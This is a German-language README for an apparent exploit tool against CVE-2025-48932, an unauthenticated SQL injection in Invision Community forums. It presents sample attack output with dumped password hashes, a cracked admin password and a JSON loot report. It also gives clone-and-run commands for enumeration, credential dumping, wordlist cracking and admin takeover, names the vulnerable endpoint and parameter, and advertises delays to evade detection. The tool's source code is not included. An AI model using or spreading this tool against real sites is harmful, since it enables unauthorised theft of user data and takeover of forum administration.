
# CVE-2025-48932 – Nicht authentifizierter SQL-Injection-Exploit für Invision Community ≤ 4.7.20. Vollautomatische Ausnutzung mit Datenbank-Enumeration, Auslesen von Anmeldedaten, Übernahme der Admin-Kontrolle, Session-Hijacking & Multithreading. Keine Abhängigkeiten erforderlich. Sicherheitsforschungs-Tool von Sudeepa Wanigarathna
CVE-2025-48932 ist eine kritische, nicht authentifizierte Blind-SQL-Injection-Schwachstelle, die in Invision Community Versionen ≤ 4.7.20 entdeckt wurde. Dieser Exploit ermöglicht entfernten Angreifern:
| Funktion | Beschreibung | Status |
|---|---|---|
| 🚀 Null Abhängigkeiten | Reine Python-Standardbibliothek – kein pip install erforderlich | ✅ |
| ⚡ Multithreaded | Blitzschnelle Datenextraktion mit konfigurierbaren Threads | ✅ |
| 🤖 Vollautomatisch | Vollständige Exploit-Kette von der Erkennung bis zur Berichterstellung | ✅ |
| 👑 Admin-Übernahme | Session-Hijacking & Privilegieneskalation | ✅ |
| 🔑 Credential-Dumping | Benutzer, Passwort-Hashes und E-Mails extrahieren | ✅ |
| 🔓 Passwort-Cracking | Integriertes Hash-Cracking mit Wordlist-Unterstützung | ✅ |
| 📋 JSON-Berichte | Strukturierte Ausgabe für Analyse & Dokumentation | ✅ |
| 🔌 Proxy-Unterstützung | Integration von Burp Suite & benutzerdefinierten Proxys | ✅ |
| 🎨 Farbige Ausgabe | Ansprechende Terminalausgabe mit Fortschrittsanzeigen | ✅ |
| 🛡️ Ratenbegrenzung | Integrierte Verzögerungen zur Vermeidung der Erkennung | ✅ |
$ python3 exploit.py -u https://vulnerable-site.com -v
╔══════════════════════════════════════════════════════════════════╗
║ CVE-2025-48932 - Invision Community SQL Injection ║
║ Author: Sudeepa Wanigarathna ║
║ Critical: Unauthenticated Remote Code Execution ║
╚══════════════════════════════════════════════════════════════════╝
[*] Target: https://vulnerable-site.com
[*] Performing vulnerability assessment...
[+] Target is confirmed VULNERABLE!
[*] Enumerating database information...
[+] Database Information:
Version: 10.4.32-MariaDB
User: invision@localhost
Database: invision_community
Hostname: localhost
Basedir: /usr/
Datadir: /var/lib/mysql/
[*] Enumerating databases...
[+] Found 5 databases
Found: information_schema
Found: invision_community
Found: mysql
Found: performance_schema
Found: phpmyadmin
[*] Enumerating tables in invision_community...
[+] Found 12 tables
Found: core_members
Found: core_sessions
Found: admin_members
Found: cms_categories
Found: forums_posts
...
[*] Searching for credentials...
[+] Found credential table: core_members
Credentials: admin - $2y$10$abcdefghijklmnopqrstuvwxyz...
Credentials: moderator - $2y$10$1234567890abcdefghijklmnop...
Credentials: user123 - $2y$10$qwertyuiopasdfghjklzxcvbnm...
[*] Extracting admin information...
[+] Admin Information Found:
name: admin
email: [email protected]
id: 1
password_hash: $2y$10$abcdefghijklmnopqrstuvwxyz...
[*] Attempting to crack password hash...
[+] Detected hash type: bcrypt
[+] Password cracked: Admin@2024!
[*] Attempting admin bypass...
[+] Admin login successful!
[+] Credentials: admin:Admin@2024!
[+] Exploitation complete!
[+] Report saved to invision_exploit_report_1700000000.json
{
"target": "https://vulnerable-site.com",
"timestamp": "2026-08-02T12:34:56.789Z",
"vulnerable": true,
"database": {
"version": "10.4.32-MariaDB",
"user": "invision@localhost",
"database": "invision_community",
"hostname": "localhost"
},
"databases": [
"information_schema",
"invision_community",
"mysql",
"performance_schema",
"phpmyadmin"
],
"tables": [
"core_members",
"core_sessions",
"admin_members"
],
"credentials": [
{
"username": "admin",
"password_hash": "$2y$10$abcdefghijklmnopqrstuvwxyz...",
"email": "[email protected]"
}
],
"admin_info": {
"name": "admin",
"email": "[email protected]",
"id": "1",
"password_hash": "$2y$10$abcdefghijklmnopqrstuvwxyz..."
},
"summary": {
"total_databases": 5,
"total_tables": 12,
"total_credentials": 3,
"vulnerable": true,
"successful": true
}
}
# Clone the repository
git clone https://github.com/CerberusMrXi/CVE-2025-48932-Invision-Community-SQLi-Exploit.git
cd CVE-2025-48932-Invision-Community-SQLi-Exploit
# No dependencies to install! Just run it.
# Check if target is vulnerable
python3 exploit.py -u https://example.com --check-only
# Full exploitation with verbose output
python3 exploit.py -u https://example.com -v
# With proxy (Burp Suite)
python3 exploit.py -u https://example.com -p http://127.0.0.1:8080 -v
# Save results to custom file
python3 exploit.py -u https://example.com -o results.json
# Multi-threaded extraction (faster)
python3 exploit.py -u https://example.com -t 10
# Dump all available data
python3 exploit.py -u https://example.com --dump-all
# With custom wordlist for password cracking
python3 exploit.py -u https://example.com --wordlist rockyou.txt -v
# Silent mode (no output, just report)
python3 exploit.py -u https://example.com -o silent_report.json
# Debug mode with detailed errors
python3 exploit.py -u https://example.com -v --debug
✅ No external dependencies!
✅ Pure Python standard library only!
✅ No pip install or virtual environment needed!
# Download popular wordlist
wget https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt
/applications/calendar/modules/front/calendar/view.phpIPS\calendar\modules\front\calendar\view::search()location (vom Benutzer bereitgestellte Eingabe)GET /applications/calendar/modules/front/calendar/view.php?do=search&location=[SQL_INJECTION_PAYLOAD]